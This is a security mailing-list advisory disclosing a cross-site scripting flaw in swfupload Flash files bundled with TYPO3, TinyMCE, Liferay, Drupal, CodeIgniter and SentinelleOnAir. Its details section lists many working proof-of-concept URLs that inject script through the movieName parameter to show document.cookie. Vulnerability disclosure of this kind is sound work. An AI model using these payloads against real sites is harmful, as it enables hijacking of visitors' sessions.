Hello list!

I will draw your attention to XSS vulnerability in other web applications
with swfupload. This is finial advisory concerning different versions of
this flash application. Earlier I've wrote about swfupload in Archiv plugin
for TinyMCE, Squeeze Documents for SPIP, Upload Manager for Radiant CMS,
AionWeb, Liferay Portal, SurgeMail, symfony and that this hole is available
in many other web applications.

In previous letters I've wrote concerning web applications with
swfupload_f8.swf, swfupload_f9.swf and swfupload.swf (which are for Flash
Player 8, 9 and 10). And now I'll write about web applications with
swfupload_f10.swf and swfupload_f11.swf (which are for Flash Player 10 and
11). Here is information about SwfUploadPanel for TYPO3 CMS, Archiv plugin
for TinyMCE, Liferay Portal (Community Edition, which earlier called
Standard Edition, and Enterprise Edition), Swfupload for Drupal, SWFUpload
for Codeigniter and SentinelleOnAir - among multiple web applications which
are bundled with swfupload_f10.swf or swfupload_f11.swf.

-------------------------
Affected products:
-------------------------

Vulnerable are potentially all versions of SwfUploadPanel for TYPO3 CMS,
Archiv plugin for TinyMCE, Liferay Portal (Community Edition, which earlier
called Standard Edition, and Enterprise Edition), Swfupload for Drupal,
SWFUpload for Codeigniter and SentinelleOnAir. There is no information that
they have fixed this vulnerability in their software (at that this
vulnerability was fixed in WordPress 3.3.2 at 20.04.2012).

The developers of WordPress released new version of flash file (the same did
the developers of XenForo), which could be used by all web developers, which
were using swfupload.

----------
Details:
----------

XSS (WASC-08):

SwfUploadPanel for TYPO3 CMS:

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/xtFramework/library/ext_plugin/SwfUploadPanel/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE:

http://site/js/tiny_mce/plugins/Archiv/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Archiv plugin for TinyMCE also contains swfupload_f10.swf, besides described
earlier swfupload_f9.swf and swfupload_f8.swf.

Liferay Portal:

http://site/html/js/misc/swfupload/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Liferay Portal also contains swfupload_f10.swf, besides described earlier
swfupload_f9.swf and swfupload_f8.swf.

Swfupload for Drupal:

As it can be seen from the project
http://code.google.com/p/drupal-swfupload/ - there is version of Swfupload
for Drupal. But exactly in this project there are no files. But they are in
the project Respectiva (http://code.google.com/p/respectiva/), which is
Drupal with Swfupload.

http://site/js/libs/swfupload_f10.swf

SWFUpload for Codeigniter:

http://site/www/swf/swfupload_f10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/www/swf/swfupload_f8.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

This is concerning swfupload_f10.swf. And concerning swfupload_f11.swf, then
in Google's index there is only one project - SentinelleOnAir, which
contains swfupload_f11.swf.

SentinelleOnAir:

http://site/upload/swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload10.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload11.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

http://site/upload/swfupload/swfupload9.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua